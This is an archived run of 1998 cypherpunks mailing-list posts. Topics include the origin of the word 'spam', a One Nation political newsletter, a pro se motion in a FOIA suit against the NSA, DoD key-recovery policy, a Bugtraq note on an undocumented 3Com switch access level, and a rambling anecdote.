To: "'StanSqncrs'" <cypherpunks@toad.com
Subject: RE: [OFF TOPIC] Spam
Message-ID: <6B5344C210C7D011835C0000F8012766017A75DD@exna01.securitydynamics.com>
MIME-Version: 1.0
Content-Type: text/plain


[Trei, Peter]  stanSqncrs [SMTP:StanSqncrs@aol.com] wrote:

>Apparently only as far back as 1993, the definition of the
>word "spam" from the on-line jargon file was this (according
>to the New Hackers Dictionary) -

>spam [from the MUD community] vt. To crash a program by
>over-running a fixed- size buffer with excessively large
>input data.  See also Buffer Overflow, Overrun Screw, Smash
>the Stack.

>Obviously that definition has changed since then.  I've seen
>it go from that to repetitive commercial advertising, and
>I've seen it used to brand someone as an outcast of a list
>for future removal simply because a small minority didn't
>like what that person had said (so it was being used at that
>time to mean 'objectional material').

>And in all the times I've seen the word fly, there has never
>been anykind of volume that would come close to overblowing
>the forum's mechanical capabilities.

>So, I'm curious as to who/what dictated the meaning of that
>to change so drasticly.  Write me in private if it's
>off-subject (and yes, you can write me anonomously if you
>don't want a response. :-) )

How quickly they forget...

It's not a change of meaning; rather, it is a new branch off
of an earlier root meaning.

The ultimate root, is of course, Hormel's processed meat
product. I don't know how old that is but it goes back at
least to WW2.

The immediate root lies in a Monty Python sketch of the
early 70's.  The text may be found at
http://w3.informatik.gu.se/~dixi/spam.htm (don't miss the
sound clip.) It takes place in a cafe, where almost every
menu item includes Spam. As a waitress reads the menu to
some patrons ("egg and spam; egg bacon and spam; egg bacon
sausage and spam; spam bacon sausage and spam; spam egg spam
spam bacon and spam; spam sausage spam spam bacon spam
tomato and spam..." etc), a group of Vikings at the next
table start to sing:

"Spam Spam Spam Spam Spam Spam Spam Spam"
"Lovely Spam! Wonderful Spam!"
"Lovely Spam! Wonderful Spam!"

(repeat endlessly)

----------------

At certain science fiction conventions in the late 70's and
early 80's it became a tradition for groups of fans (to whom
the Pythons were minor deities) to parade en mass through
the corridors of convention hotels singing the Spam Song.
Many online fen were also active in early MUDs, so the term
came to be used for unwanted, repetitive, voluminous, and
content-free input of all kinds.

------------

Flash forward to April 14, 1994. 

The WWW is not on most peoples radar yet; it's still the Age
of Usenet. 

Cantor & Siegel, a pair of shysters, figure out that they
can advertise their dubious 'services' (charging $100 for
information which the government gives out for free) at no
cost on usenet.  Like many lawyers, they suffer from a
mental disorder which leads them to believe that any action
which is not explicitly against the law is reasonable and
appropriate.  They send their ad to over 5000 newsgroups,
regardless of topic.

In those days, many netusers read multiple newsgroups every
morning. That day, every newsgroup you opened included the
same article in the subject list, along with dozens of angry
denouncments of the off-topic post.

*Every* *single* *newsgroup*.

The resemblance to the menu at the Python cafe was
unmistakeable, and 'spam' was the term instantly adopted to
describe the practice.

Since then, the use of the term 'spam' has been expanded to
refer to any sort of off-topic and undesired information
sent over the net, especially when a shotgun approach is
used.

Question: When was the *first* spam type message? I remember
in the early 80's a student spammed Usenet, asking for small
donations to help him meet tuition. Are there any earlier
cases?

Peter Trei
ptrei@securitydynamics.com 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Global Web Builders <gwb@gwb.com.au>
Date: Wed, 6 May 1998 22:01:03 -0700 (PDT)
To: (Recipient list suppressed)
Subject: Pauline Hanson's One Nation May 1998 Newsletter
Message-ID: <1.5.4.32.19980507045734.00a25f80@mail.pronet.net.au>
MIME-Version: 1.0
Content-Type: text/plain


Issue 1.9, May 1998

----------------------------------------------------------------------------
PLEASE NOTE: No unsolicited email is sent. If you do not want to be on the
mailing list please say "REMOVE" in the subject line and return this message
in the body.
----------------------------------------------------------------------------

Dear One Nation supporter in New South Wales,

It is now becoming extremely important that you make your desire to help One
Nation in the upcoming Federal election known to your local branch.

Your local contact (by email or phone) can be seen at the following URL:
http://www.gwb.com.au/onenation/federal/become.htm

Please let these key people know how you can help, whether it be by
assisting in mail drops or manning polling booths. 

We need your help!

During the last six weeks we have, as a political party, reached many
milestones.

These milestones, covered on the Internet, include: 

- One Nation's birthday party at my farm on April 11th
See: http://www.gwb.com.au/gwb/news/history/day1.html for coverage and images.
- the launch of the One Nation Federal Web site:
http://www.gwb.com.au/onenation/federal

There have also been a number of press releases on a range of issues. These
can be seen at:
http://www.gwb.com.au/onenation/press 

You might not be aware that negotiation on the MAI (multilateral agreement
on investment) has been delayed, not stopped. See this URL for my press
release on the MAI:
http://www.gwb.com.au/onenation/press/010598.html

For more information on this secret international treaty, visit:
http://www.gwb.com.au/mai.html

Finally, we need your financial assistance. We are not going to get the big
business million dollar donations like the major parties. We depend on YOU
to help us to promote the image and policies of this party at the upcoming
Federal election.

Please assist if and where you can. There is an on-line donation form at:
http://www.gwb.com.au/pledge.html 

Regards,


Pauline Hanson





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: StanSqncrs <StanSqncrs@aol.com>
Date: Thu, 7 May 1998 14:11:10 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Spam
Message-ID: <a16f8820.3552232b@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


Thanks to Peter Trei for that bit of history.

In a message dated 5/7/98 10:26:48 AM Central Daylight Time, jim@mentat.com
writes:

<< I just wrote and snipped a long disquisition on the history of spam
starting
 with Clarence Thomas IV in 1993, having realized it's probably not relevant
to
 your interests ... >>

Actually, by the timing you describe, it would probably make it VERY relevant
to my interests.  I'd love to see it.


<< and old hat to everybody else.  Suffice it to say that spam
 does require extra resources to process, both in hardware and time.  We
resent
 it because the end user is paying for it rather than the advertiser, so there
 is no natural limit to the amount of crap they can pour on us. >>

But times have changed again.  Now the users have unlimited access.

BTW:  As I understand it, the corporations were given free-speech rights with
a bad Supreme Court decision back in the '20's, even though the constitution
only grants rights to "people" and "citizens" (14th amendment)

Stan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Fri, 8 May 1998 07:51:21 -0700 (PDT)
To: kalliste@aci.net>
Subject: http://www.jya.com/whp043098.htm
Message-ID: <35530212.62B0@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain


Friday 5/8/98 6:25 AM

John Young
J Orlin Grabbe

Sobolewski phoned last night.

Sobolewski gave me his opinion.

1  Campos is going to hold in camera ex parte conference with NSA
2  Campos will then award summary judgment to NSA.

I told Sobolewski that most of the legal citations in Campos' document
were not contained in the pleadings.

Sobolewski EXCLAIMED, "Oh."

Sobolewski is particularly good at law.  Sobolewski's father was a
lawyer and judge both in Poland and Australia.

Sobolewski prevailed in an lawsuit spanning the US and Australia - but
it still cost him more than $20k TELLING a lawyer what to do.

Sobowleski usually beats speeding tickets.

Sobolewski uses DISCOVERY to obtain maintenance and calibration
records of police radar.  And also radar operation training records of
the officer who stopped him.

The MEMORANDUM OPINION AND ORDER authored by some government 
lawyers and signed by Campos is clearly a candidate for one of the
STUPIDEST and INCOMPETENT legal documents ever written.
http://www.jya.com/whp043098.htm

Morales and I LOVE IT, of course!  

This is why we were so happy last Friday.  We got another shot at THEM
[aka The Great Satan].

Morales is taking the day off from Sandia today.  

We will finish and file our motion.  Then BLAST it out on the Infobahn.

I see other good legal advice linked at http://www.aci.net/kalliste/

http://www.phrack.com/52/P52-05

Later
bill






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Fri, 8 May 1998 12:01:06 -0700 (PDT)
To: jim.moran@mail.house.gov
Subject: FILED 98 MAY - 8 AM 11:31
Message-ID: <3553504B.6AA9@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain

John Young

File-stamped copy was mailed to you at US Courthouse.

Later
bill


                    UNITED STATES DISTRICT COURT
                 FOR THE DISTRICT OF NEW MEXICO


William H. Payne        	   	    		            )
Arthur R. Morales                           			)
                                            				)
                Plaintiffs,                 			            )
                                            				)
v                                           				)	CIV NO 97 0266 
							)	SC/DJS
			                    			)
Lieutenant General Kenneth A. Minihan, USAF 	            )
Director, National Security Agency	    		)
National Security Agency		    		)
                                            				)
                Defendant                   			)


PLAINTIFFS' MOTION TO AMEND Santiago E. Campos MEMORANDUM 
OPINION AND ORDER FILED 98 APR 30 AM 11:45

1  COMES NOW plaintiffs Payne  and Morales [Plaintiffs] to exercise their rights under the Federal 

Rules of Civil Procedure, Rule 52. Findings by the Court; Judgment on Partial Findings

  (b) Amendment. On a party's motion filed no later than 10 days after 
  entry of judgment, the court may amend its findings--or make additional 
  findings--and may amend the judgment accordingly. ...

2 Plaintiffs will show that the Court's [Campos]  MEMORANDUM OPINION AND ORDER 

http://www.jya.com/whp043098.htm contains presumably-unintentional false statements or misleading 

statements of essential material facts.

Plaintiffs move to permit Campos to amend ORDER to reflect proper remedy of obvious evidence

of lack of impartiality and judicial misconduct.

A  judge is supposed to judge arguments presented by the Plaintiffs and the Defendant.

An  judge is NOT SUPPOSED to engage in legal research designed to support either Plaintiff or 

Defendant's case.

Judge Campos was  supposed to rely on legal citations presented ONLY by pro se Plaintiffs or 

NSA Defendant  Minihan's  lawyer,  Assistant US Attorney Jan Elizabeth Mitchell [Mitchell].

MEMORANDUM  OPINION AND ORDER contains OVER ABOUT 144 legal citations most of 

which WERE NOT PRESENTED TO THE COURT in pleadings by either Plaintiffs or Defendant.

3  Campos writes

  Plaintiffs contend that Federal Civil Procedure Rule 36 explicitly provides that discovery is 
  allowed without leave of the court. Plaintiffs quote citation   The Court is unsure where 
  Plaintiffs found the language  they quote, but it is incorrect.

Federal Civil Judicial Procedure and Rules, WEST PUBLISHING  COMPANY, 1991 Revised 

Edition, page 110 states, 
 
 Rule 36.  Requests for Admission

  Request for admission (a) A party may serve upon any other 
  party a written request for the  admission, for the  purposes of 
  the pending action only, of the truth of any  matters within the  
  scope of Rule 26(b) set forth the request that relate to statements 
  or opinions of fact or of the application of law to fact including 
  the genuineness of any documents described in the request.   
  Copies of documents shall  be served with the request unless 
  they have been or otherwise  furnished or made available for 
  inspection and  copying.  The request may WITHOUT LEAVE  
  OF THE COURT, be served  upon the plaintiff after 
  commencement of  the action and upon any  other party with 
  or after service of the  summons and complaint upon that 
  party. ... 
 
Updated Rule 36 seen at http://www.law.cornell.edu/rules/frcp/overview.htm,

click at 36. Requests for Admission states

  A party may serve upon any other party a written request for the admission, for  purposes of the   
  pending action only, of the truth of any matters within the scope  of Rule 26(b)(1) set forth in the 
  request that relate to statements or opinions of fact or of the application of law to fact, including the 
  genuineness of any  documents described in the request. Copies of documents shall be served with 
  the request unless they have been or are otherwise furnished or made available  for inspection and 
  copying.   Without leave of court or written stipulation,  requests for admission may not be served 
  before the time specified in Rule 26(d) .

Rule 26(d) states

  (d) Timing and Sequence of Discovery.

  Except when authorized under these rules or by local rule, order, or agreement of the parties, a party   
  may not seek discovery from any source before the parties have met and conferred as required by 
  subdivision (f). Unless the court upon motion, for the convenience of parties and witnesses and in the 
  interests of justice, orders otherwise, methods of discovery may be used in any sequence, and the fact 
  that a party is conducting discovery, whether by deposition or otherwise, shall not operate to delay 
  any other party's discovery.

Essential material facts are

1  5/23/97 Docket Sheet entry 9 Plaintiffs file   MOTION by plaintiff for order to accept discovery 

plan (dmw)

2  Defiant misses filing date for response to entry 9.

3  Plaintiffs' file on 6/9/97 Docket Sheet entry 13  MOTION by plaintiff to 

accept discovery plan of plaintiffs as an unopposed motion before the court (dwm)

4  In panic Defendant's lawyer US Mitchell submits on 6/9/97 Docket Sheet entry 14,
  
RESPONSE by defendant to motion to accept discovery plan of plaintiffs as an 

unopposed motion before the Court [13-1] (dwm) [Entry date  06/10/97]

Lawyer Mitchell, apparently realizing her legal procedural blunder, is 

forced to deposit her LATE MOTION in Court outside mailbox since entry was 

not stamped FILED until June 10.

The "time specified in Rule 26(d)" was satisfied, therefore Plaintiffs were with

the law for proceeding with discovery.

4  Campos cites in 

  B. Standing of Plaintiff Morales  ... see also NLRB v. Sears. Roebuck &  Co., 421 U.S. 132, 144 n.
  10 ( 1975).

Plaintiffs can find no reference to NLRB v. Sears. Roebuck &  Co in Mitchell's pleadings

Therefore Campos reaches conclusion that Morales should be removed partially on obviously biased

citations of Campos own legal research.

5  Campos writes in 

 C. Proper Defendant

Campos cites the following legal citations to justify dismissing defendant Minihan

1  Thompson v. Walbran, 990 F.2d 403, 405 (8thCir. 1993) (per curiam); 
2  Petrus v. Bowen, 833 F.2d 581, 582-83 (5th Cir.1987); 
3  Sherwood Van Lines, Inc. v. United States Department of the Navy,732 F. Supp. 240, 241 (D.D.C.    
    1990); 
4  Gary Energy Corp. v. United StatesDepartment of Energy, 89 F.R.D. 675, 675-77 (D. Colo. 1981). 
5  But see, e.g Diamond v. FBI, 532 F. Supp. 216, 21920 (S.D.N.Y. 1981), aff'd on other
    grounds, 707 F.2d 75 (2d Cir. 1983); 
6  Hamlin v. Kelley, 433 F. Supp. 180,181 (N.D. Ill. 1977).
7  Parks v. IRS, 618 F.2d 677 684 (10th Cir. 1980)

Plaintiffs can find NONE of the above legal citations in ANY pleadings before the Court.

Therefore, Plaintiffs conclude that Campos is obviously biased and has improperly introduced legal

citations in an attempt to have Minihan dismissed.

6  Campos cites in 
 
 III. FOIA
 A. FOIA Policy

1  NLRB v, Robbins Tire & Rubber Co.,     437 U.S. 214, 242 (1978).
2  Anderson v. Department of Health and Human Services,907 F.2d 936, 941 (10th Cir. 1990)
3  Maricopa Audubon Society v. United States Forest Service, 923 F. Supp. 1436, 1438-39
(D.N.M. 1995)
4  Maricopa Audubon Society v. United States Forest Service, 923 F. Supp. 1436, 1438-39
(D.N.M. 1995)
5  Hale v. United States Department of Justice, 973 F.2d894, 897 (10th Cir. 1992) 
6  (citing EPA v. Mink, 410 U.S. 73, 79-80 (1973), vacated on other grounds, 509 U.S. 918 (1993));
7  Office of Information and Privacy, U.S. Department of Justice, Freedom of Information
   Act Guide & Privacy Act Overview 3 (Sept. 1997 ed.)
8  S. Rep. No. 813, 89th Cong., 1st Sess. 10 (1965),
9  United States Department of Justice v. Reporters Commission for Freedom of the Press, 489 U.S.   
    749, 773  (1989);see id. at 774
10  Air Force v. Rose, 425 U.S. 352, 360-61(1976); 
11  Anderson v. Department of Health and Human Services, 907 F.2d 936,941 (10th Cir. 1990); 
12  Johnson v. United States Department of Justice, 739F.2d 1514, 1516 (10th Cir. 1984)
13   Hale v. United States Department of Justice, 2 F.3d 1053, 1057 (10th Cir. 1993);
14  Cal-Almond, Inc. v. United States Department of Agriculture, 960 F.2d 105, 107 (9th Cir. 1992).
15  Bowen v.United States Food and Drug Administration, 925 F.2d 1225, 1226 (9th Cir. 1991) . 
16  King v. Department of Justice, 830 F.2d 210, 217 (D.C. Cir.1987).
17  Vaughn v. Rosen, 484 F.2d 820 (D.C.Cir. 1973); 
18  Weiner v. FBI, 943 F.2d 972, 977 (9th Cir. 1991).
19  Halperin v. CIA, 629 F.2d 144, 14849 (D.C. Cir. 1980);

Plaintiffs can find NONE of the above citation of law in pleadings before this Court

Campos is obviously biased for including above 18 citations.

Campos cites internet addresses

1  <  http://www.usdoj.gov/oip/oip.html >
2  < http://www.usdoj.gov/oip/oip.html > 
3  < http://www.usdoj.gov/oip/oip.html > 
4  < http://www.usdoj.gov/oip/oip.html> 
5  < http://www.usdoj.gov/oip/oip.html>
6  <http://www.usdoj.gov/oip/oip.html>

Mitchell cites no Internet address in her pleadings.

Above Internet address citations are not those given by Plaintiffs.

Therefore, Campos introduces material not in pleadings before this court in his

MEMORANDUM OPINION AND ORDER.

7  Campos cites in

  B. Exhaustion of Administrative Remedies

1  Taylor v. United States Treasury Department, 127 F.3d 470,475 (5th Cir. 1997)
2  Taylor v. Appleton, 30 F.3d 1365, 1367 n.3 (11th Cir. 1994)
3  Volvo GM Heavy Truck Corp. v. United States Department of Labor, 118 F.3d 205,
    08-09 (4th Cir. 1997)
4  Trenerry v. Internal Revenue Service, No. 95-5150, 70 F.3d 598, 1996 WL 88459 at *1 (10th Cir.    
    March 1, 1996)
5  Lanter v. Department of Justice, No. 93-6308, 19 F.3d 33, 1994 WL 75876 at *1 (10th Cir. March 
    8, 1994)
6  Hass v. United States Air Force, 848 F. Supp. 926, 929 (D. Kan. 1994)
7  Katzman v. CIA, 903 F. Supp.434, 437 (E.D. N.Y. 1995) (citing Becker v. Internal Revenue 
    Service, 34 F.3d 398, 405 (7th Cir. 1994)).
8  Ruotolo v. Department of Justice, 53 F.3d 4, 8 (2d Cir. 1995);
9  Spannaus v. United States Department of Justice, 824 F.2d 52, 59 (D.C. Cir 1987);
10 Kuchta v. Harris, No. 92-1121, 1993 WL 87705 at *3 (D.Md. March 25, 1993)
11 Trueblood v. United States Department of Treasury, 943 F. Supp. 64, 66-67 (D.D.C. 1996);

Plaintiffs could NOT find ANY of the above legal citations in pleadings before this Court.

Campos gives biased opinion on exhaustion of administrative remedies.

8  Campos cites in

  C. Summary Judgment

1  Haines v. Kerner, 404 U.S. 519, 520 (1972) (per curiam).
2  Shabazz v. Askins, 14 F.3d 533, 535 (10th Cir. 1994).
3  Green v.Dorrell, 969 F.2d 915, 917 (10th Cir. 1992).
4  Anderson v. Liberty Lobby, Inc., 477 U.S. 242, 249, 255 (1986).
5  Magnum Foods, Inc. v. Continental Casualty Co., 36 F.3d 1491, 1497 (10th Cir. 1994).
6  World of Sleep. Inc. v. La-Z-Boy Chair Co., 756 F.2d 1467, 1474 (10th Cir. 1985)
7  Celotex Corp. v. Catrett. 477 U.S. 317, 325 (1986).
8  Bacchus Industries. Inc. v. Arvin Industries. Inc., 939 F.2d 887,891 (10th Cir. 1991).

Plaintiffs can find none of the above citation in pleadings before this Court.

9  Campos cites in

  3. Plaintiff's First Summary Judgment Motion

1  Powell v. McCormack, 395 U.S. 486, 496 (1969)
2  Phillippi v. CIA, 546 F.2d 1009, 1013 (D.C. Cir. 1976).
3  Patterson v. FBI, 705 F. Supp. 1033, 1039 (D.N.J. 1989), aff'd 898 F.2d 595 (3d Cir. 1990).
4  American Friends Service Committee v. Department of Defense, 831 F.2d 441, 444 (3d
    Cir. 1987) 
5  Salisbury v. United States, 690 F.2d 996, 970 (D.C. Cir. 1982) 
6  Sen. Report No. 1200, 93rd Cong. 12 (1974), U.S. Code Cong. & Admin. News 6267, 6290   
   (1974)).
7  AG's 1993 FOIA Memorandum
8  Afshar v. Department of State, 702 F.2d 1125, 1130 (D.C. Cir. 1983).
9  Pfeiffer v. CIA, 721 F. Supp. 337, 342 (D.D.C. 1989)
10  Public Citizen v. Department State, 11 F.3d 198, 204 (D.C. Cir. 1993).
11  Fitzgibbon v. CIA, 911 F.2d 755, 766 (D.C. Cir. 1990)
12  Military Audit Project v. Casey, 656 F.2d 724, 74345 (D.C. Cir 1981)
13  Phillippi v. CIA, 655 F.2d 1325, 1332-33 (D.C. Cir. 1981)
14  McNamera v. United States Department of Justice, 974 F. Supp. 946, 955-56 (W.D. Tex. 1997).
15  Halperin v. CIA, 629 F.2d 144, 14849 (D.C. Cir. 1980),
16  United States Department of Justice v. Reporters Committee for Freedom of  the Press, 489 U.S. 
      749, 773 (1989);
17  King v. United States Department of Justice, 830 F.2d 210, 224 (D.C. Cir. 1987); 
18  Fitzgibbon v. CIA, 578 F. Supp. 704, 709 (D.D.C. 1983).
19  Katzman v. CIA, 903 F. Supp. 434, 438 (E.D.N.Y. 1995).
20  McDonnell v. United States, 4 F.3d 1227, 1246 (3d Cir. 1993) (citing Association of
      Retired Railroad Workers v. United States Railroad Retirement Board, 830 F.2d 331, 336 (D.C. 
      Cir. 1987)).
21  United States Department of Justice v. Reporters Committee for Freedom of the Press, 489 U.S. 
      749, 775 (1989).
22  Founding Church of Scientology v. NSA, 610 F.2d 824, 30, 833 & n. 80 (D.C. Cir. 1979).
23  EPA v. Mink, 410 U.S. 73, 80 (1973); 
24  NLRB v. Robbins Tire & Rubber Co., 437 U.S. 214, 242 (1978).

Plaintiffs cannot find any of the above 24 citation in pleadings before this Court.

9  Campos writes

  Consequently, the Court requests that Defendant provide it, as it has
  offered to do, an in camera ex parte declaration or detailed affidavit
  explaining its reasons for its "Glomar response" and for nondisclosure of
  none of the Iranian and Libyan messages and translations from June 1, 1980
  to June 10,1996, if they do exist. See Anderson v. Department of Health and
  Human Services, 907 F.2d 936, 942. (10th Cir. 1990).24 The declaration of
  affidavit must be provided by the Defendant to the Court within sixty days of the 
  date of this opinion. The Court will stay its decision on Defendant's Motion for 
  Summary Judgment (Exemption 3) until after it has heard or examined Defendant's 
  explanation.

and quotes

  24 As the Tenth Circuit has explained:

  In order to fulfill its obligation to review de novo the agency's decision not to disclose materials  
  sought under  the FOIA, a district court has a  variety of options. "The FOIA allows the district court 
  flexibility in utilizing  in camera review of the disputed documents, indexing, oral testimony, detailed  
  affidavits, or alternative  procedures to determine whether a  sufficient factual basis exists for 
  evaluating the correctness of the  [agency] determination in each case." [If a Vaughn index or  an 
  affidavit is insufficient,] then the district  court must utilize other procedures in order to develop an 
  adequate factual  basis for review of the agency  action.

  Anderson v. Department of Health and Human Services, 907 F.2d 936, 942
  (10th Cir. 1990) (quoting DeSalvo v. Internal Revenue Service, 861 F.2d
  1217, 1222 n.6 (10th Cir. 1988) (first alteration in Anderson)).

Plaintiffs cannot find reference to 

1  Anderson v. Department of Health and Human Services, 907 F.2d 936, 942  (10th Cir. 1990) 
2  DeSalvo v. Internal Revenue Service, 861 F.2d  1217, 1222 n.6 (10th Cir. 1988) 

in pleadings before this Court.

WHEREFORE  Plaintiffs move for Campos to amend MEMORANDUM OPINION AND ORDER
	
which currently reads

10  NOW, THEREFORE, IT IS ORDERED that sua sponte, Defendant is DEEMED by the
  Court to be the NSA, and not Lt. Gen. Kenneth A. Minihan. Future captions
  for this case should reflect this change.

  IT IS FURTHER ORDERED that Plaintiff's Motion for Summary Judgment is
  DENIED without prejudice.

  IT IS FURTHER ORDERED that Defendant's Motion to Dismiss Plaintiff Morales
  is GRANTED.

  IT IS FURTHER ORDERED that, in regard to Defendant's Motion for Partial
  Dismissal and for Summary Judgment, Defendant's Motion for Partial
  Dismissal is DENIED and Defendant's Motion for Summary Judgment is STAYED
  pending an in camera ex parte declaration consistent herewith provided by Defendant to
  the Court within sixty (60) days of the date of this opinion.

  IT IS FURTHER ORDERED that Plaintiff's Motion for Summary Judgment Based on
  Evidence from Admissions is DENIED as MOOT.

to read

11 Santiago Campos disqualifies himself  under 

 28 USC  455. Disqualification of justice, judge, or magistrate 

    (a) Any justice, judge, or magistrate of the United States shall 
    disqualify himself  in any proceeding in which his impartiality 
    might reasonably be questioned. ...

from further participation in  case CIV NO 97 0266, UNITED STATES DISTRICT COURT  FOR 

THE DISTRICT OF NEW MEXICO for basing much of  MEMORANDUM OPINION AND 

ORDER FILED 98 APR 30 AM 11:45 on materials not contained in pleadings before the Court and 

vacates ORDER FILED 98 APR 30 AM 11:45.



                    Respectfully submitted, 
 
 

	        William H. Payne             	   	     
                    13015 Calle de Sandias NE          	     
                    Albuquerque, NM 87111              	     
 
 			
                    
                    Arthur R. Morales                            
                    1024 Los Arboles NW                         
                    Albuquerque, NM 87107                        
 
                    Pro se litigants 
 
 
               CERTIFICATE OF SERVICE 
 
I HEREBY CERTIFY that a copy of the foregoing memorandum
was mailed to Lieutenant General Kenneth A. Minihan, USAF, 
Director,  National Security Agency, National Security Agency, 
9800 Savage Road, Fort George G. Meade, MD 20755-6000 
and hand delivered to Jan E Mitchell, Assistant US Attorney, 
525 Silver SW, ABQ, NM 87102 this Friday May 8, 1998. 



9






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iw@merkur.contexo.de (Ingo Wechsung)
Date: Fri, 8 May 1998 05:19:49 -0700 (PDT)
To: cypherpunks@toad.com
Subject: My mail address changed
Message-ID: <9805081217.AA03419@merkur.contexo.de>
MIME-Version: 1.0
Content-Type: text/plain


Your mail address cypherpunks@toad.com was found in one of my mailboxes.
I want to inform you, that the following mail addresses

	iw@return-online.de
	ingo.wechsung@return-online.de
	iw@cas-nord.de
	ingo.wechsung@return-online.de

will be invalid from July 1st, 1998 on.

Please use one of the following addresses from now on:

	iw@contexo.de
	ingo.wechsung@contexo.de

Kind Regards
Ingo Wechsung




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Trei, Peter" <ptrei@securitydynamics.com>
Date: Fri, 8 May 1998 12:03:43 -0700 (PDT)
To: "'cypherpunks@toad.com>
Subject: DoD orders vendors to use Key "Recovery"
Message-ID: <6B5344C210C7D011835C0000F8012766017A75E6@exna01.securitydynamics.com>
MIME-Version: 1.0
Content-Type: text/plain



I hope someone sends them the NSA report on the security hazards of
KR. 

Peter Trei
ptrei@securitydynamics.com

---------------
http://www.gcn.com/gcn/1998/May4/cov1.htm

GCN May 4, 1998 

Defense wants PKI now 
Department intends to make vendors use strong encryption 
By Christopher J. Dorobek 

To jump-start development of a public-key recovery system, the Defense
Department plans to require its vendors to use strong encryption,
deputy Defense secretary John Hamre said recently.

Because it wields significant buying clout, Defense's more stringent
requirements should boost government and industry efforts to build
systems for managing encryption keys, Hamre said last month at an
Armed Forces Communications and Electronics Association event in
Washington.

Agencies cannot wait for the government and industry to settle on a
national encryption policy, Hamre said.

Through successive administrations, the government has tried to
develop a singular policy on encryption. But so far, the efforts have
failed.  Generally, industry has criticized the government's policy
proposals as too restrictive.

"We have an important national imperative to protect ourselves in this
world," Hamre said. "We can't wait to have this issue resolved ...
therefore we're going to buy encryption with key recovery."

Vendors will have to use encrypted data and be able to recover it when
doing business with DOD, he said.

Defense will work out a final policy in the coming weeks, Hamre said.

[...]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sunder <sunder@brainlink.com>
Date: Fri, 8 May 1998 14:07:47 -0700 (PDT)
To: cypherpunks@ssz.com
Subject: [Fwd: 3Com switches - undocumented access level.]
Message-ID: <355372B4.C837F915@brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain

--

To: BUGTRAQ@NETSPACE.ORG
Subject: Re: 3Com switches - undocumented access level.
From: Toh Chang Ying <cytoh@PLEXUS.NET>
Date: Fri, 8 May 1998 18:42:47 +0800
Approved-By: aleph1@NATIONWIDE.NET
Organization: HICOM Teleservices
Reply-To: "cytoh@plexus.net" <cytoh@plexus.net>
Sender: Bugtraq List <BUGTRAQ@NETSPACE.ORG>

The sender was deleted to prevent flames. Don't flame me either. I'm just a poor 3Com user.

-----Original Message-----
From:
Sent:   Friday, May 08, 1998 3:32 PM
Subject:        Re: FW: 3Com switches - undocumented access level.

Toh,
     Thank you for bringing this up for our attention. First of all, let me
assure you that the undocumented access level for the LANplex/Corebuilder
products are purely for support reasons then anything else. We have many
cases where customers will forget their passwords or userids and find
themselves in a spot as they could not get in to the console. This is the
only way we can help them to recover from this situation without losing
their entire configuration. As far as I know, many vendors also have some
kind of special access methods to assist their customer under such
circumstances.These special access methods are for 3 Com support persons
only and are revealed to customers under very special circumstances.
Because the CoreBuilders/LanPlex are typically deployed at the core of a
network, the config for these equipment is typically complex and very
important to the customers. As such, these method can safe the customer a
lot of time and inconvenience by recovering their proper access to the
equipment. If we have to set these equipment to factory default every time
a customer lose his/her password, we will be in a lot of trouble.

As for the stackables, I believe we do not have this access method. That's
because these equipment is plug n play and do not have many parameters to
reconfigure. In the event, a customer loses his/her password, we can just
set everything back to factory default.

Regards,
********** http://www.plexus.net/ ***********
Toh Chang Ying, MCP, Network Operation Centre
HICOM Teleservices Sdn Bhd (323218-A)
Suite 3.5, Wisma HICOM, 2 Jln Usahawan U1/8
40150 Shah Alam, Malaysia
Email: cytoh@plexus.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Toto <toto@sk.sympatico.ca>
Date: Fri, 8 May 1998 17:24:23 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Dialogue - SPACE ALIENS HIDE MY DRUGS!!!
Message-ID: <3553A2E3.2E06@sk.sympatico.ca>
MIME-Version: 1.0
Content-Type: text/plain


Dialogue - SPACE ALIENS HIDE MY DRUGS!!!
_______________________________________

WAS: BASIC TRUTHS!

Everyone Has A Photographic Memory...Some Don't Have Film:

  I've got film...

  Pretty Harry, a MarijuanIzen of Garberville, Humbolt County, 
California, was a man who paid close attention to the vagarities of life 
that comprised his MeatSpace environment.
  I was sitting with him in 'The Cellar', a local bar, one night, when 
an effeminate young gentleman from the BigCity came in, sat at a table 
in the middle of the bar, and ordered a drink. Every RedNeck in the bar 
cast derisive looks in the young gentleman's direction
in order to impress upon him that they could do one-armed push-ups, were 
sexually excited only by women, and didn't cotton to young gentlemen 
with full, red lips drinking in 'their' bar, in 'their' town...
  Pretty Harry gave everyone time to get in a threatening scowl, or two, 
and then go back to minding their own business, forgetting about the 
effeminate young gentleman, and he then proceeded to walk over, grab the 
youth by the hair, tilt back his head, and proceed to give him a wet, 
sloppy kiss, with plenty of 'tongue'.  
  Since Pretty Harry was an established member of the local social 
scene, those who observed the event merely barfed into their beers and 
continued whatever they were doing at the time, pretending that they 
hadn't really seen what they had really seen.
  
  This event confirmed what I had already suspected...Pretty Harry was a 
cool dude.

  Pretty Harry sat and talked with me for about twenty minutes, just 
long enough for those present to bury the memory of what had occurred, 
and then proceeded to walk over to the young gentleman's table and 
repeat the action which was so delightfully delicious to the effeminate 
young man from the BigCity, and so disgustingly depraved to the Local 
Yokels who could do one-armed push-ups, and were sexually excited only 
by women.
  This is when I realized that Pretty Harry was WayCool (TM)...

  My point is this...
  Pretty Harry, having proven his deep understanding of the Tao of Life, 
given his ability to throw a Serious Fuck (TM) into the normal 
progression of MeatSpace Reality, was astute enough to tell me, "I've 
noticed that when you come into the bars in town, you sit quietly in the 
corner, and watch what is going on around you. You know more about 'us' 
than 'we' do..."
  There's the Watchers...there's those Watching the Watchers...there's 
those Watching
the Watchers Watching the Watchers...

A Day Without Sunshine Is Like...Night:

  One thing that you will notice if you have the retained the ability to 
